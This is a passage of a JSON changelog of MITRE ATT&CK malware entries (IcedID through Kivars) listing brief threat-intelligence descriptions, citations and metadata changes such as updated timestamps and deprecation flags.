{\"new_value\": \"2025-04-25 14:42:55.977000+00:00\", \"old_value\": \"2025-04-16 20:38:00.476000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--5be33fef-39c0-4532-84ee-bea31e1b5324", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:43:29.589000+00:00", + "name": "ISMInjector", + "description": "[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0189", + "external_id": "S0189" + }, + { + "source_name": "ISMInjector", + "description": "(Citation: OilRig New Delivery Oct 2017)" + }, + { + "source_name": "OilRig New Delivery Oct 2017", + "description": "Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ISMInjector" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Robert Falcone" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:29.589000+00:00\", \"old_value\": \"2025-04-16 20:38:11.226000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-15 17:55:11.252000+00:00", + "modified": "2025-04-22 22:16:09.049000+00:00", + "name": "IcedID", + "description": "[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0483", + "external_id": "S0483" + }, + { + "source_name": "IBM IcedID November 2017", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" + }, + { + "source_name": "Juniper IcedID June 2020", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "IcedID" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jorge Orchilles", + "Zaw Min Htun, @Z3TAE", + "Matt Brenton, Zurich Global Information Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:16:09.049000+00:00\", \"old_value\": \"2024-10-28 19:20:20.633000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][2]\": \"Matt Brenton, Zurich Global Information Security\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][1]\": \"Matt Brenton\"}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:39.436000+00:00", + "name": "InnaputRAT", + "description": "[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim\u2019s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0259", + "external_id": "S0259" + }, + { + "source_name": "InnaputRAT", + "description": "(Citation: ASERT InnaputRAT April 2018)" + }, + { + "source_name": "ASERT InnaputRAT April 2018", + "description": "ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.", + "url": "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "InnaputRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:39.436000+00:00\", \"old_value\": \"2025-04-16 20:38:34.903000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:10.665000+00:00", + "name": "InvisiMole", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0260", + "external_id": "S0260" + }, + { + "source_name": "InvisiMole", + "description": "(Citation: ESET InvisiMole June 2018)" + }, + { + "source_name": "ESET InvisiMole June 2018", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "InvisiMole" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:10.665000+00:00\", \"old_value\": \"2025-04-16 20:38:05.140000+00:00\"}}}", + "previous_version": "2.1" + }, + { + "type": "malware", + "id": "malware--aaf3fa65-8b27-4e68-91de-2b7738fe4c82", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-18 17:20:43.635000+00:00", + "modified": "2025-04-25 14:44:21.898000+00:00", + "name": "JCry", + "description": "[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0389", + "external_id": "S0389" + }, + { + "source_name": "JCry", + "description": "(Citation: Carbon Black JCry May 2019)" + }, + { + "source_name": "Carbon Black JCry May 2019", + "description": "Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.", + "url": "https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "JCry" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:21.898000+00:00\", \"old_value\": \"2025-04-16 20:38:29.735000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--de6cb631-52f6-4169-a73b-7965390b0c30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:51.758000+00:00", + "name": "JPIN", + "description": "[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0201", + "external_id": "S0201" + }, + { + "source_name": "JPIN", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "JPIN" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:51.758000+00:00\", \"old_value\": \"2025-04-16 20:38:38.557000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f559f945-eb8b-48b1-904c-68568deebed3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-22 14:44:48.087000+00:00", + "modified": "2025-04-25 14:45:05.560000+00:00", + "name": "JSS Loader", + "description": "[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0648", + "external_id": "S0648" + }, + { + "source_name": "eSentire FIN7 July 2021", + "description": "eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels\u2019 Owner, Brown-Forman Inc.. Retrieved September 20, 2021.", + "url": "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "JSS Loader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:05.560000+00:00\", \"old_value\": \"2025-04-16 20:38:43.545000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--64122557-5940-4271-9123-25bfc0c693db", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-09 18:32:18.369000+00:00", + "modified": "2025-04-25 14:43:35.588000+00:00", + "name": "Javali", + "description": "[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0528", + "external_id": "S0528" + }, + { + "source_name": "Securelist Brazilian Banking Malware July 2020", + "description": "GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.", + "url": "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Javali" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:35.588000+00:00\", \"old_value\": \"2025-04-16 20:38:13.353000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:43.623000+00:00", + "name": "KEYMARBLE", + "description": "[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0271", + "external_id": "S0271" + }, + { + "source_name": "KEYMARBLE", + "description": "(Citation: US-CERT KEYMARBLE Aug 2018)" + }, + { + "source_name": "US-CERT KEYMARBLE Aug 2018", + "description": "US-CERT. (2018, August 09). MAR-10135536-17 \u2013 North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.", + "url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "KEYMARBLE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:43.623000+00:00\", \"old_value\": \"2025-04-16 20:37:56.418000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--7dbb67c7-270a-40ad-836e-c45f8948aa5a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:43:51.104000+00:00", + "name": "KOMPROGO", + "description": "[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0156", + "external_id": "S0156" + }, + { + "source_name": "KOMPROGO", + "description": "(Citation: FireEye APT32 May 2017)" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "KOMPROGO" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:51.104000+00:00\", \"old_value\": \"2025-04-16 20:38:19.228000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--26fed817-e7bf-41f9-829a-9075ffac45c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:57.344000+00:00", + "modified": "2025-04-25 14:42:52.151000+00:00", + "name": "Kasidet", + "description": "[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0088", + "external_id": "S0088" + }, + { + "source_name": "Zscaler Kasidet", + "description": "Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.", + "url": "http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kasidet" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:52.151000+00:00\", \"old_value\": \"2025-04-16 20:37:58.992000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--536be338-e2ef-4a6b-afb6-8d5568b91eb2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:19.859000+00:00", + "name": "Kazuar", + "description": "[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0265", + "external_id": "S0265" + }, + { + "source_name": "Kazuar", + "description": "(Citation: Unit 42 Kazuar May 2017)" + }, + { + "source_name": "Unit 42 Kazuar May 2017", + "description": "Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kazuar" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:19.859000+00:00\", \"old_value\": \"2025-04-16 20:38:07.739000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--8c1d01ff-fdc0-4586-99bd-c248e0761af5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-02 13:38:32.673000+00:00", + "modified": "2025-04-25 14:43:59.023000+00:00", + "name": "Kerrdown", + "description": "[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0585", + "external_id": "S0585" + }, + { + "source_name": "Amnesty Intl. Ocean Lotus February 2021", + "description": "Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.", + "url": "https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" + }, + { + "source_name": "Unit 42 KerrDown February 2019", + "description": "Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus\u2019 new Downloader, KerrDown. Retrieved October 1, 2021.", + "url": "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kerrdown" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:59.023000+00:00\", \"old_value\": \"2025-04-16 20:38:21.498000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--d6e55656-e43f-411f-a7af-45df650471c5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-06 12:22:23.447000+00:00", + "modified": "2025-04-25 14:44:48.521000+00:00", + "name": "Kinsing", + "description": "[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0599", + "external_id": "S0599" + }, + { + "source_name": "Aqua Kinsing April 2020", + "description": "Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.", + "url": "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" + }, + { + "source_name": "Sysdig Kinsing November 2020", + "description": "Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.", + "url": "https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/" + }, + { + "source_name": "Aqua Security Cloud Native Threat Report June 2021", + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", + "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kinsing" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers", + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:48.521000+00:00\", \"old_value\": \"2025-04-16 20:38:37.411000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-06 18:10:59.143000+00:00", + "modified": "2025-04-25 14:44:27.009000+00:00", + "name": "Kivars", + "description": "[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0437", + "external_id": "S0437" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kivars" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:27.009000+00:00\", \"old_value\": \"2025-04-16 20:38:31.015000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9abdda30-08e0-4ab1-9cf0-d447654c6de9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-24 18:56:35.507000+00:00", + "modified": "2025-04-25 